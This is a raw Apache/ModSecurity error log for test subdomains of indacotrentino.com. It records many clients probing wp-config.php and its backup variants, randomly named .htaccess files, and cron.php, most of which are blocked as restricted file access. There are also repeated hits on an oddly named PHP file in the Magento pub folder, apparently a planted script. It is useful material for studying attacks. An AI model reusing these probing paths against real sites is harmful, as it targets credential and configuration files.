[Sun Nov 23 00:21:11.259611 2025] [authz_core:error] [pid 264185] [client 212.30.33.38:9093] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:21:55.216502 2025] [authz_core:error] [pid 264147] [client 46.246.122.37:1063] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:22:40.726393 2025] [php:warn] [pid 264147] [client 179.6.0.207:10148] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:22:44.992154 2025] [authz_core:error] [pid 263848] [client 185.40.4.101:51424] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:22:46.407868 2025] [authz_core:error] [pid 264185] [client 2.57.170.237:31516] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:23:59.458676 2025] [autoindex:error] [pid 264147] [client 178.175.140.220:43903] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive
[Sun Nov 23 00:24:36.819505 2025] [php:warn] [pid 264216] [client 217.170.194.172:52141] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:24:37.432172 2025] [php:warn] [pid 264142] [client 93.71.103.137:53803] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:24:37.984524 2025] [authz_core:error] [pid 264147] [client 46.246.122.37:24236] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:24:38.471528 2025] [php:warn] [pid 264211] [client 185.40.4.143:51482] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:24:38.503153 2025] [authz_core:error] [pid 264212] [client 185.40.4.143:51496] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:24:38.871837 2025] [authz_core:error] [pid 264142] [client 2.57.170.237:57322] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:25:05.294891 2025] [authz_core:error] [pid 264184] [client 46.246.122.37:42604] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:31:52.666295 2025] [:error] [pid 264142] [client 93.71.103.137:53911] [client 93.71.103.137] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /riaklsya1utresu8j.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/RiaklsyA1uTrEsU8j.htaccess"] [unique_id "aSJH6DACHkR_YOZwyOjAEgAAAAQ"]
[Sun Nov 23 00:31:52.666660 2025] [:error] [pid 264142] [client 93.71.103.137:53911] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/RiaklsyA1uTrEsU8j.htaccess"] [unique_id "aSJH6DACHkR_YOZwyOjAEgAAAAQ"]
[Sun Nov 23 00:31:52.666847 2025] [:error] [pid 264142] [client 93.71.103.137:53911] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/RiaklsyA1uTrEsU8j.htaccess"] [unique_id "aSJH6DACHkR_YOZwyOjAEgAAAAQ"]
[Sun Nov 23 00:31:52.969010 2025] [:error] [pid 264212] [client 93.71.103.137:37927] [client 93.71.103.137] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /yuheylfuubg_96uewz.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/YuHEYLfUUBG_96uEWZ.htaccess"] [unique_id "aSJH6MeatXoUO6wBiGntZwAAAAk"]
[Sun Nov 23 00:31:52.969328 2025] [:error] [pid 264212] [client 93.71.103.137:37927] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/YuHEYLfUUBG_96uEWZ.htaccess"] [unique_id "aSJH6MeatXoUO6wBiGntZwAAAAk"]
[Sun Nov 23 00:31:52.969503 2025] [:error] [pid 264212] [client 93.71.103.137:37927] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/YuHEYLfUUBG_96uEWZ.htaccess"] [unique_id "aSJH6MeatXoUO6wBiGntZwAAAAk"]
[Sun Nov 23 00:31:53.273138 2025] [:error] [pid 264147] [client 93.71.103.137:50283] [client 93.71.103.137] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /t_pzsgkavozsl9zr7xb.htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/T_pzsgkavoZSl9zR7XB.htaccess"] [unique_id "aSJH6TzntZDulJ5yce3TdwAAAAg"]
[Sun Nov 23 00:31:53.273432 2025] [:error] [pid 264147] [client 93.71.103.137:50283] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/T_pzsgkavoZSl9zR7XB.htaccess"] [unique_id "aSJH6TzntZDulJ5yce3TdwAAAAg"]
[Sun Nov 23 00:31:53.273598 2025] [:error] [pid 264147] [client 93.71.103.137:50283] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/T_pzsgkavoZSl9zR7XB.htaccess"] [unique_id "aSJH6TzntZDulJ5yce3TdwAAAAg"]
[Sun Nov 23 00:31:53.577817 2025] [authz_core:error] [pid 264158] [client 93.71.103.137:40509] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:33:00.850371 2025] [authz_core:error] [pid 264216] [client 93.71.103.137:37951] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:34:12.406947 2025] [:error] [pid 264184] [client 93.71.103.137:58505] [client 93.71.103.137] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJIdHHQwttq68ko8qFbqAAAAAA"]
[Sun Nov 23 00:34:12.407246 2025] [:error] [pid 264184] [client 93.71.103.137:58505] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJIdHHQwttq68ko8qFbqAAAAAA"]
[Sun Nov 23 00:34:12.407418 2025] [:error] [pid 264184] [client 93.71.103.137:58505] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJIdHHQwttq68ko8qFbqAAAAAA"]
[Sun Nov 23 00:35:08.852762 2025] [:error] [pid 264184] [client 93.71.103.137:39649] [client 93.71.103.137] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.malware"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJIrHHQwttq68ko8qFbuQAAAAA"]
[Sun Nov 23 00:35:08.853208 2025] [:error] [pid 264184] [client 93.71.103.137:39649] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJIrHHQwttq68ko8qFbuQAAAAA"]
[Sun Nov 23 00:35:08.853498 2025] [:error] [pid 264184] [client 93.71.103.137:39649] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJIrHHQwttq68ko8qFbuQAAAAA"]
[Sun Nov 23 00:35:12.910371 2025] [:error] [pid 263848] [client 93.71.103.137:43211] [client 93.71.103.137] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.suspected"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJIsN1BKOLABWPPh6ldYgAAAAI"]
[Sun Nov 23 00:35:12.910781 2025] [:error] [pid 263848] [client 93.71.103.137:43211] [client 93.71.103.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJIsN1BKOLABWPPh6ldYgAAAAI"]
[Sun Nov 23 00:35:12.910957 2025] [:error] [pid 263848] [client 93.71.103.137:43211] [client 93.71.103.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJIsN1BKOLABWPPh6ldYgAAAAI"]
[Sun Nov 23 00:36:45.794502 2025] [authz_core:error] [pid 264142] [client 156.146.41.199:41833] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:36:46.498317 2025] [authz_core:error] [pid 263846] [client 149.102.237.53:41225] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:36:46.846939 2025] [:error] [pid 264184] [client 185.40.4.150:54002] [client 185.40.4.150] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDnHQwttq68ko8qFbwwAAAAA"]
[Sun Nov 23 00:36:46.847197 2025] [:error] [pid 264184] [client 185.40.4.150:54002] [client 185.40.4.150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDnHQwttq68ko8qFbwwAAAAA"]
[Sun Nov 23 00:36:46.847400 2025] [:error] [pid 264184] [client 185.40.4.150:54002] [client 185.40.4.150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDnHQwttq68ko8qFbwwAAAAA"]
[Sun Nov 23 00:36:47.405524 2025] [:error] [pid 264212] [client 209.50.228.91:56865] [client 209.50.228.91] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.malware"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJD8eatXoUO6wBiGntrgAAAAk"]
[Sun Nov 23 00:36:47.405782 2025] [:error] [pid 264212] [client 209.50.228.91:56865] [client 209.50.228.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJD8eatXoUO6wBiGntrgAAAAk"]
[Sun Nov 23 00:36:47.405958 2025] [:error] [pid 264212] [client 209.50.228.91:56865] [client 209.50.228.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJD8eatXoUO6wBiGntrgAAAAk"]
[Sun Nov 23 00:36:47.479610 2025] [:error] [pid 264147] [client 2.57.170.237:48796] [client 2.57.170.237] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.malware"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJDzzntZDulJ5yce3UEgAAAAg"]
[Sun Nov 23 00:36:47.479865 2025] [:error] [pid 264147] [client 2.57.170.237:48796] [client 2.57.170.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJDzzntZDulJ5yce3UEgAAAAg"]
[Sun Nov 23 00:36:47.480047 2025] [:error] [pid 264147] [client 2.57.170.237:48796] [client 2.57.170.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.malware"] [unique_id "aSJJDzzntZDulJ5yce3UEgAAAAg"]
[Sun Nov 23 00:36:47.723440 2025] [:error] [pid 264158] [client 15.161.128.233:54851] [client 15.161.128.233] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDwSlFzDzj7JYZO0dUgAAAAw"]
[Sun Nov 23 00:36:47.723707 2025] [:error] [pid 264158] [client 15.161.128.233:54851] [client 15.161.128.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDwSlFzDzj7JYZO0dUgAAAAw"]
[Sun Nov 23 00:36:47.723902 2025] [:error] [pid 264158] [client 15.161.128.233:54851] [client 15.161.128.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSJJDwSlFzDzj7JYZO0dUgAAAAw"]
[Sun Nov 23 00:36:47.774071 2025] [authz_core:error] [pid 264227] [client 46.246.122.37:5486] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
[Sun Nov 23 00:36:48.240464 2025] [:error] [pid 263849] [client 149.102.237.53:47133] [client 149.102.237.53] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.suspected"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDoxksB4bGpq0Of_iwAAAAs"]
[Sun Nov 23 00:36:48.240757 2025] [:error] [pid 263849] [client 149.102.237.53:47133] [client 149.102.237.53] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDoxksB4bGpq0Of_iwAAAAs"]
[Sun Nov 23 00:36:48.240976 2025] [:error] [pid 263849] [client 149.102.237.53:47133] [client 149.102.237.53] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDoxksB4bGpq0Of_iwAAAAs"]
[Sun Nov 23 00:36:48.496694 2025] [:error] [pid 264142] [client 217.170.194.172:57757] [client 217.170.194.172] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.suspected"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.suspected"] [unique_id "aSJJEDACHkR_YOZwyOjAWgAAAAQ"]
